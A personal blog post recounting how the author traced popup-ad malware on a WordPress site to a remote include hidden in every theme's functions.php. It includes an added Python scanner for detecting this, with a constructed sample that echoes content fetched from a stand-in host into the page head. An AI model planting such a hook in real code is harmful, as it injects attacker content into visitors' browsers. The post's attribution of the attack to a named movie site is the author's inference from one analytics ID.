An Encounter with Malware MW:JS:GEN2

Achindra Bhatnagar
3 min read, Sep 15, 2017

I am sharing an interesting story that also summarizes the last 8 hours of my day! Although this is the second time I am writing this post, since the previous one was published without any content, I have no regrets writing it down again :-)

A friend of mine hosts a website for a customer. I was asked to look at the website because it was behaving weirdly: every link you click opens a popup that takes you to some advertisement site. I observed that the links themselves work fine; there is just an extra popup. So I started investigating…

It started with the Gut

Gut feeling: given the behaviour, it must be a client-side issue and probably something in JavaScript. I looked at the page source to see if anything was visibly wrong in the headers. Everything looked normal; there is a lot of stuff in there, but all of it was standard.

I searched for “javascript” and, after scanning the highlights a few times, I found the link embedded in the page.

[Screenshot: the embedded script link found in the page source]

When I accessed these links, they indeed took me to the random advertisement pages. So I asked: where did these links come from?

Exploration

I downloaded their complete site and searched for these URLs; they were nowhere to be found. I opened different pages and found that this script gets loaded towards the end of the page, before all other scripts.

I disabled all plugins, but the code was still there. So I searched the database and found nothing!

Sit Back

Everyone was anxious, trying all kinds of brute-force methods: searching through code and database tables, disabling themes and plugins. But nothing. I then sat in my chair, swinging and thinking about what I would do if I had to build something like this.

Eureka!

All great ideas come in the toilet (like my morning tweets from the toilet seat).

What if I fetched my content from an external link and embedded it in the page? I had done this in one of my many college projects. I searched for all the URLs in the source code, then filtered out all the URLs pointing to the current site, the installed themes and the plugins. And I found my needle in the haystack!

[Screenshot: the external URL found in functions.php]

I found the URL above in the functions.php file of every theme. I checked this URL, and this is where the script and the malicious URL get embedded from.
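As an added example (not code from the original post), here is a small Python scanner that applies the same idea: collect every URL in a theme's PHP source, drop the ones pointing to the site's own host, and flag lines where a remaining external URL sits next to a call that pulls remote content into the page. The functions.php content, the domain names and the function names are all constructed for the demonstration.

```python
import re

# Constructed sample of a theme functions.php that fetches remote content
# and echoes it into the page head; not the real file from the post.
SAMPLE_FUNCTIONS_PHP = r'''<?php
function theme_setup() {
    add_theme_support('post-thumbnails');
    wp_enqueue_style('main', get_stylesheet_uri());
}
add_action('after_setup_theme', 'theme_setup');

// Legitimate reference to the site itself (constructed domain)
$home = 'https://example-customer-site.com/';

function inject_header() {
    // Remote content fetched and echoed straight into the page
    echo file_get_contents('http://cdn-stats-example.invalid/js/head.php');
}
add_action('wp_head', 'inject_header');
'''

URL_RE = re.compile(r'https?://[^\s\'"<>)]+')
# PHP calls that pull content from elsewhere; an external URL next to one is the signal
REMOTE_FETCH_RE = re.compile(
    r'\b(file_get_contents|curl_init|curl_setopt|wp_remote_get|wp_remote_post|fopen|include|require)\s*\(')


def external_urls(php_source, own_hosts):
    """Return URLs whose host is not one of the site's own domains."""
    found = []
    for m in URL_RE.finditer(php_source):
        host = re.sub(r'^https?://', '', m.group(0)).split('/')[0].lower()
        if host not in own_hosts:
            found.append(m.group(0))
    return found


def suspicious_lines(php_source, own_hosts):
    """Flag (line number, text) pairs combining a remote-fetch call with an external URL."""
    hits = []
    for lineno, line in enumerate(php_source.splitlines(), 1):
        if REMOTE_FETCH_RE.search(line) and external_urls(line, own_hosts):
            hits.append((lineno, line.strip()))
    return hits


if __name__ == '__main__':
    own = {'example-customer-site.com'}
    for lineno, text in suspicious_lines(SAMPLE_FUNCTIONS_PHP, own):
        print(f'functions.php:{lineno}: {text}')
```

Run it over every functions.php under wp-content/themes with the site's real hostnames in `own_hosts`; the site's own URLs drop out of the list and the remote include is what remains.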

[Screenshot: the content served from that URL, which embeds the script and the malicious URL]

To fix the issue, I removed all of this header and the issue was gone, but then I also had to remove it from all the themes installed on that server.

It’s a Malware!

While this is a JavaScript-based malware, I found that it is classified as MW:JS:GEN2 in security terms, and it gets in through wrong permissions or an outdated theme, plugin or WordPress version. It reiterates, yet again, how important it is to stay updated.

If you look closely, there is UA-9664825, a Google Analytics ID. I searched for it and found that it is associated with GoFilmz.com, which is a movie site and runs click-ads, probably for revenue. The site is registered by “Brea, California US, New Dream Network, LLC (AS26347)”. The attacker is probably generating click-ad traffic for this site.

Late to sleep… (Tried to report it to Google Ads)
